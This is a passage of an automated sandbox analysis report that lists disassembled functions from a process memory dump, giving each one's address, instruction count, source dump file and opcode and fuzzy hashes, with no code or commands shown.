                                            Function 00007FFD9B8A1A35 Relevance: .4, Instructions: 361COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd2a96705c91fd2d2cbd8e3111b7988180c3c4c5f386af57683ba1e3e204dab9
                                            • Instruction ID: 1b11c344f32247d03c6318efedd4ab28fa6b5caa92f55e6f3e7161d37ab36d7d
                                            • Opcode Fuzzy Hash: dd2a96705c91fd2d2cbd8e3111b7988180c3c4c5f386af57683ba1e3e204dab9
                                            • Instruction Fuzzy Hash: B2C10672A09A8D8FEB58DB6CD8657E97BE0FF19300F0402BAD058C72E2DE792402C741
                                            Function 00007FFD9B8A0A19 Relevance: .3, Instructions: 283COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a54e763b1ac7d0a1a6ddbc1f6ede2f2196eebaeb3d6dfb6fec3b452693ba15ee
                                            • Instruction ID: 958cc97d9d1b52868aaa4f849a63009e66509d7a9c4ee9cd2037e4ffc908a9ed
                                            • Opcode Fuzzy Hash: a54e763b1ac7d0a1a6ddbc1f6ede2f2196eebaeb3d6dfb6fec3b452693ba15ee
                                            • Instruction Fuzzy Hash: 67713811F2EA4D0AE76866BC08652B976C2DF89B15F26027DE4DFC32E7EC1C69074251
                                            Function 00007FFD9B8A1AFD Relevance: .3, Instructions: 273COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0b6bd2f6c3444730c2737c46d82e2fea435b9e7d8a5efdc65c12000bf2ef160
                                            • Instruction ID: 10af3e41ac0b2ed0bff9718c7780d7973f19ecbf0c5dc7ee7d25dbdd8e704be6
                                            • Opcode Fuzzy Hash: d0b6bd2f6c3444730c2737c46d82e2fea435b9e7d8a5efdc65c12000bf2ef160
                                            • Instruction Fuzzy Hash: A5A1A271A19A8D8FEB98DB68D8657E8BBE1FF59300F4002BAD01DD72E6DB791402C741
                                            Function 00007FFD9B8A1295 Relevance: .2, Instructions: 152COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2135456722cd5a8d7fe98bde48d2dc8c01d7aaf6ebd16249d7c2693dc41506f7
                                            • Instruction ID: 8b3fc745d994b87272f8fce8f65aac7a03745fd15a7d48048a38ea4207be9085
                                            • Opcode Fuzzy Hash: 2135456722cd5a8d7fe98bde48d2dc8c01d7aaf6ebd16249d7c2693dc41506f7
                                            • Instruction Fuzzy Hash: D6418031A0891D8FDB58EFA8E855AEDB7A0FF58314F10017BD41DD7296DE34A842CB90
                                            Function 00007FFD9B8A12B0 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0649b6b15979677ce02947f36d49683a8cebc8fd468059de8ef6edf94fd23f08
                                            • Instruction ID: 7e81de38f7515a957658d8e825573ea4c62406866ab1f311b63ed2d5bdb259f4
                                            • Opcode Fuzzy Hash: 0649b6b15979677ce02947f36d49683a8cebc8fd468059de8ef6edf94fd23f08
                                            • Instruction Fuzzy Hash: E4416E31A1891D8FDB58EFA8E855AED77A1FF58314F10017AE41DD3296DE34A842CB80
                                            Function 00007FFD9B8A12E8 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ff2a08922a690ecf5bd80ecbf6440f7ab247680ab9a0df05cb85045e4050c1b
                                            • Instruction ID: 8e307dacc08e3ba456fdae39499b21312866c4f319a5ddf5f5c28cf4185fc127
                                            • Opcode Fuzzy Hash: 9ff2a08922a690ecf5bd80ecbf6440f7ab247680ab9a0df05cb85045e4050c1b
                                            • Instruction Fuzzy Hash: C4410C30A1495D8FDF94EF98D495AEDBBF1FF58301F10017AE419E3295DA34A842CB50
                                            Function 00007FFD9B8A0838 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7caf3701b9afe6b7a8e2de3847650a051367b918d9521e72b6e1f2ad95e4f217
                                            • Instruction ID: 2a0c2364b3d6de9a09afd9d4678364af9ac9960486f585a0915a0d1ccc4ba54e
                                            • Opcode Fuzzy Hash: 7caf3701b9afe6b7a8e2de3847650a051367b918d9521e72b6e1f2ad95e4f217
                                            • Instruction Fuzzy Hash: 92213D32A1E2A84FD725AB7C68594FB7FE0EF49229B14027BE4DDC6193DA2490468391
                                            Function 00007FFD9B8A070D Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c9929a75b0ecb9bf71d347ccbf95a55e533aec3f70bbd97952fc241220402d8
                                            • Instruction ID: 57faffa374fd7835e421e681a1a65540f618de5d35811768c8deb59a25876c70
                                            • Opcode Fuzzy Hash: 5c9929a75b0ecb9bf71d347ccbf95a55e533aec3f70bbd97952fc241220402d8
                                            • Instruction Fuzzy Hash: 44117330E2951E9AEB61FFE894596FD7BE0FF18304F110476E41CC21A4DE346294CB92
                                            Function 00007FFD9B8A0730 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6116fc2e9a866f60c656ed21a5cd442dc7d6815969eb76eda9d698ee1b548b94
                                            • Instruction ID: 46f4bc9ba875281dad4cdec80a810ebccc1e75757a2ec8421975d1f0006b027a
                                            • Opcode Fuzzy Hash: 6116fc2e9a866f60c656ed21a5cd442dc7d6815969eb76eda9d698ee1b548b94
                                            • Instruction Fuzzy Hash: BBF01C3091590E9FDB90EFA8D8596EE7BE0FF58305F01057AE81CC21A4DA34A6A4CB81
                                            Function 00007FFD9B8A1745 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad365635562271192039f9bd634b38f7898fe5cff414628d19aaa626e99a41a5
                                            • Instruction ID: faee6dd879fce0bce81b4f87bac2269d3cb1e115a69c4859e3ec29770f8cc7f8
                                            • Opcode Fuzzy Hash: ad365635562271192039f9bd634b38f7898fe5cff414628d19aaa626e99a41a5
                                            • Instruction Fuzzy Hash: 36F01C34A1951DDBDB64EBA8E911AEA77A0EF04304F000075E41DC2195DA34A665DB91
                                            Function 00007FFD9B8ACC31 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000031.00000002.2983339577.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_49_2_7ffd9b8a0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0007e1b84e3ccab852ab16d94c6f4f43cf82396447f0a3c00b4896ab247f84b6
                                            • Instruction ID: 77cea8b73891acdd2257816faa00ee49fb7290c45c9fb49f540f588c54913cf2
                                            • Opcode Fuzzy Hash: 0007e1b84e3ccab852ab16d94c6f4f43cf82396447f0a3c00b4896ab247f84b6
                                            • Instruction Fuzzy Hash: F2F05E70E2555A8AE7A8DF08C8646FE6271EF84344F0102F6901CA31A6DE342E818B40